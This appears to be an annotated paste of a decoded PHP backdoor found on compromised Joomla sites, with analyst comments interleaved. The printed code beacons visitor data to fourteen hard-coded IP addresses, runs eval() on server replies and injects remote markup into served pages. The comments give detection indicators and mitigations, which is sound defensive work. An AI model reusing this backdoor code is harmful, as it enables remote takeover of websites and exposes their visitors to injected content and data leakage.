kerryadams

Joomla hackies backdoor decoded

May 28th, 2012
  1. <?php if (!function_exists ("GetMama"))
  2.   {
  /**
   * Inserts the markup held in $_SERVER["good"] into an HTML page.
   *
   * Analyst notes (defensive reading of the decoded sample):
   * - $_SERVER["good"] is not a genuine server variable. Elsewhere in this paste it is
   *   filled from a remote server's reply, so its content is attacker-controlled.
   * - Only the literal tags "<body>" and "</body>" are matched (case-insensitively), and
   *   only when the tag occurs exactly once. Any other page is returned unchanged.
   * - When cleaning a site, remember the injected markup exists only in the served
   *   response; it is not written into the page templates by this function.
   *
   * @param string $buf Page output to be altered.
   * @return string The page with the remote markup inserted, or the input unchanged.
   */
  3.     function mod_con ($buf)
  4.     {
           // Replacing "<body>" with itself changes nothing and the result is discarded;
           // the call is made only for its by-reference match count in $cnt_h.
  5.       str_ireplace ("<body>", "<body>", $buf, $cnt_h);
  6.       if ($cnt_h == 1)
  7.     {
           // Exactly one opening tag: place the remote markup directly after it.
  8.       $buf =
  9.         str_ireplace ("<body>", "<body>".stripslashes ($_SERVER["good"]),
  10.               $buf);
  11.       return $buf;
  12.     }
           // Otherwise count closing tags the same way.
  13.       str_ireplace ("</body>", "</body>", $buf, $cnt_h);
  14.       if ($cnt_h == 1)
  15.     {
           // Exactly one closing tag: place the remote markup directly before it.
  16.       $buf =
  17.         str_ireplace ("</body>",
  18.               stripslashes ($_SERVER["good"])."</body>", $buf);
  19.       return $buf;
  20.     }
           // Neither tag matched exactly once: the page is passed through untouched.
  21.       return $buf;
  22.     }
  /**
   * Output-buffer callback that routes the finished page through mod_con().
   *
   * Analyst notes (defensive reading of the decoded sample):
   * - This paste registers the function with ob_start("opanki"), so it receives the
   *   buffered response body of the request.
   * - If the response is gzip-encoded, the body is decompressed via a temporary file,
   *   altered, and compressed again; otherwise it is altered directly.
   * - Host artifact: a short-lived file created under /tmp with the prefix "FOO" and
   *   removed again within the same request.
   * - Content-Length is rewritten so the altered body stays consistent with its header.
   *
   * @param string $buf Buffered response body.
   * @return string The body to send, possibly altered and re-compressed.
   */
  23.     function opanki ($buf)
  24.     {
  25.       $gz_e = false;
  26.       $h_l = headers_list ();
           // Exact string comparison: only a header spelled precisely
           // "Content-Encoding: gzip" selects the gzip path.
  27.       if (in_array ("Content-Encoding: gzip", $h_l))
  28.     {
  29.       $gz_e = true;
  30.     }
  31.       if ($gz_e)
  32.     {
           // The compressed body is written to disk so it can be read back through gzopen().
  33.       $tmpfname = tempnam ("/tmp", "FOO");
  34.       file_put_contents ($tmpfname, $buf);
  35.       $zd = gzopen ($tmpfname, "r");
           // At most 10,000,000 decompressed bytes are read; anything beyond is dropped.
  36.       $contents = gzread ($zd, 10000000);
  37.       $contents = mod_con ($contents);
  38.       gzclose ($zd);
  39.       unlink ($tmpfname);
  40.       $contents = gzencode ($contents);
  41.     }
  42.       else
  43.     {
  44.       $contents = mod_con ($buf);
  45.     }
           // Announce the new body length so the modified response is not truncated or padded.
  46.       $len = strlen ($contents);
  47.       header ("Content-Length: ".$len);
  48.       return ($contents);
  49.     }
  /**
   * Returns a hard-coded identifier that the beacon sends as its "mother" parameter.
   *
   * Analyst notes (defensive reading of the decoded sample):
   * - NOTE(review): "haplessvictim.ord" looks like a placeholder put in by whoever posted
   *   the paste, presumably replacing the real value -- confirm against an original sample.
   * - The guard at the top of the paste tests function_exists("GetMama"), so the whole
   *   snippet is skipped when a copy has already been loaded in the same request.
   *
   * @return string The hard-coded identifier.
   */
  50.     function GetMama ()
  51.     {
  52.       $mother = "haplessvictim.ord";
  53.       return $mother;
  54.     }
  // Analyst note: buffers all output produced after this point and hands it to opanki()
  // when the buffer is flushed, which is how the response body is altered before sending.
  55.     ob_start ("opanki");
  /**
   * Beacon and command fetch: reports the current request to the host in $pa and acts on the reply.
   *
   * Analyst notes (defensive reading of the decoded sample):
   * - Request: GET http://<$pa>/jedi.php with the parameters version, mother, file, host,
   *   ip, ref, ua and qs. It discloses the path of the infected file (__FILE__) together
   *   with the visitor's IP address, referrer, user agent and query string. That lets the
   *   remote side answer differently per visitor (presumably for cloaking; this cannot be
   *   verified from the paste).
   * - Transport: cURL with a 3 second timeout if the extension exists, otherwise
   *   file_get_contents() when allow_url_fopen is enabled, otherwise a raw HTTP/1.0
   *   request over fsockopen() to port 80.
   * - Reply containing "eval": the marker is stripped, the rest is passed to eval() and
   *   the request is terminated. This is arbitrary remote code execution with the
   *   privileges of the web server account.
   * - Reply containing "ebna": the marker is stripped and the rest is stored in
   *   $_SERVER["good"], which mod_con() later inserts into the page.
   * - Detection: outbound HTTP from the web server to "/jedi.php?version=0991&mother=..."
   *   is a usable proxy, firewall or IDS indicator, and the "file=" value in such a
   *   request names the infected file on disk.
   *
   * @param string $pa Host to contact (an IP address in this paste).
   * @return bool True if an "ebna" reply was stored for injection, false otherwise;
   *              does not return when an "eval" reply is executed.
   */
  56.     function ahfudflfzdhfhs ($pa)
  57.     {
  58.       $mama = GetMama ();
           // Full path of the file carrying this code, sent to the remote host.
  59.       $file = urlencode (__FILE__);
           // Host and client IP are placed into the URL without urlencode(),
           // unlike the referrer, user agent and query string below.
  60.       if (isset ($_SERVER["HTTP_HOST"]))
  61.     {
  62.       $host = $_SERVER["HTTP_HOST"];
  63.     }
  64.       else
  65.     {
  66.       $host = "";
  67.     }
  68.       if (isset ($_SERVER["REMOTE_ADDR"]))
  69.     {
  70.       $ip = $_SERVER["REMOTE_ADDR"];
  71.     }
  72.       else
  73.     {
  74.       $ip = "";
  75.     }
  76.       if (isset ($_SERVER["HTTP_REFERER"]))
  77.     {
  78.       $ref = urlencode ($_SERVER["HTTP_REFERER"]);
  79.     }
  80.       else
  81.     {
  82.       $ref = "";
  83.     }
  84.       if (isset ($_SERVER["HTTP_USER_AGENT"]))
  85.     {
  86.       $ua = urlencode (strtolower ($_SERVER["HTTP_USER_AGENT"]));
  87.     }
  88.       else
  89.     {
  90.       $ua = "";
  91.     }
  92.       if (isset ($_SERVER["QUERY_STRING"]))
  93.     {
  94.       $qs = urlencode ($_SERVER["QUERY_STRING"]);
  95.     }
  96.       else
  97.     {
  98.       $qs = "";
  99.     }
           // Plain HTTP request; the path and parameter names below are stable strings
           // suitable for network signatures.
  100.       $url_0 = "http://".$pa;
  101.       $url_1 =
  102.     "/jedi.php?version=0991&mother=".$mama."&file=".$file."&host=".$host.
  103.     "&ip=".$ip."&ref=".$ref."&ua=".$ua."&qs=".$qs;
  104.       $try = true;
           // First choice: cURL. $try is cleared whether or not the transfer succeeded,
           // so the two fallbacks below are reached only when the cURL extension is absent.
  105.       if (function_exists ("curl_init"))
  106.     {
  107.       $ch = curl_init ($url_0.$url_1);
  108.       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  109.       curl_setopt ($ch, CURLOPT_TIMEOUT, 3);
  110.       $ult = trim (curl_exec ($ch));
  111.       $try = false;
  112.     }
           // Second choice: URL wrapper, with warnings suppressed by "@".
  113.       if ((ini_get ("allow_url_fopen")) && $try)
  114.     {
  115.       $ult = trim (@file_get_contents ($url_0.$url_1));
  116.       $try = false;
  117.     }
           // Last choice: hand-built HTTP/1.0 request on TCP port 80 (30 second connect timeout).
  118.       if ($try)
  119.     {
  120.       $fp = fsockopen ($pa, 80, $errno, $errstr, 30);
  121.       if ($fp)
  122.         {
  123.           $out = "GET $url_1 HTTP/1.0\r\n";
               // NOTE(review): ". =" with a space does not parse as PHP; the original was
               // presumably ".=" and the space looks like an artifact of the tool used to
               // pretty-print the decoded sample. Do not rely on this listing's whitespace
               // when writing file signatures.
  124.           $out. = "Host: $pa\r\n";
  125.           $out. = "Connection: Close\r\n\r\n";
  126.           fwrite ($fp, $out);
  127.           $ret = "";
  128.           while (!feof ($fp))
  129.         {
  130.           $ret. = fgets ($fp, 128);
  131.         }
  132.           fclose ($fp);
               // Keep only the response body (everything after the blank line ending the headers).
  133.           $ult = trim (substr ($ret, strpos ($ret, "\r\n\r\n") + 4));
  134.         }
  135.     }
           // If the socket could not be opened, $ult has not been assigned at this point.
           // Command channel 1: a reply containing "eval" is executed as PHP code.
  136.       if (strpos ($ult, "eval") !== false)
  137.     {
           // Every occurrence of the marker "eval" is removed before the rest is executed.
  138.       $z = stripslashes (str_replace ("eval", "", $ult));
  139.       eval ($z);
  140.       exit ();
  141.     }
           // Command channel 2: a reply containing "ebna" carries markup to inject into the page.
  142.       if (strpos ($ult, "ebna") !== false)
  143.     {
  144.       $_SERVER["good"] = str_replace ("ebna", "", $ult);
  145.       return true;
  146.     }
  147.       else
  148.     {
  149.       return false;
  150.     }
  151.     }
  // Analyst notes (defensive reading of the decoded sample):
  // - $father2 is a hard-coded list of 14 IPv4 addresses used as beacon targets. They are
  //   indicators of compromise taken from a paste dated May 2012; the addresses may have
  //   been reassigned since, so corroborate them before blocking or attributing.
  // - This code sits at the top level of the snippet, so it runs whenever the infected
  //   file is loaded, and the visitor's request waits on the outbound connection(s).
  // - Mitigation: denying outbound connections from the web server, except to required
  //   destinations, stops both the beacon and the remote-code channel.
  152.     $father2[] = "78.46.173.14";
  153.     $father2[] = "176.9.218.191";
  154.     $father2[] = "91.228.154.254";
  155.     $father2[] = "77.81.241.253";
  156.     $father2[] = "184.82.117.110";
  157.     $father2[] = "46.4.202.93";
  158.     $father2[] = "46.249.58.135";
  159.     $father2[] = "176.9.241.150";
  160.     $father2[] = "46.37.169.56";
  161.     $father2[] = "46.30.41.99";
  162.     $father2[] = "94.242.255.35";
  163.     $father2[] = "178.162.129.223";
  164.     $father2[] = "78.47.184.33";
  165.     $father2[] = "31.184.234.96";
           // Randomise the order so requests are spread across the listed hosts.
  166.     shuffle ($father2);
           // Try each host in turn and stop at the first one that returns an "ebna" payload.
  167.     foreach ($father2 as $ur)
  168.     {
  169.       if (ahfudflfzdhfhs ($ur))
  170.     {
  171.       break;
  172.     }
  173.     }
  174.   }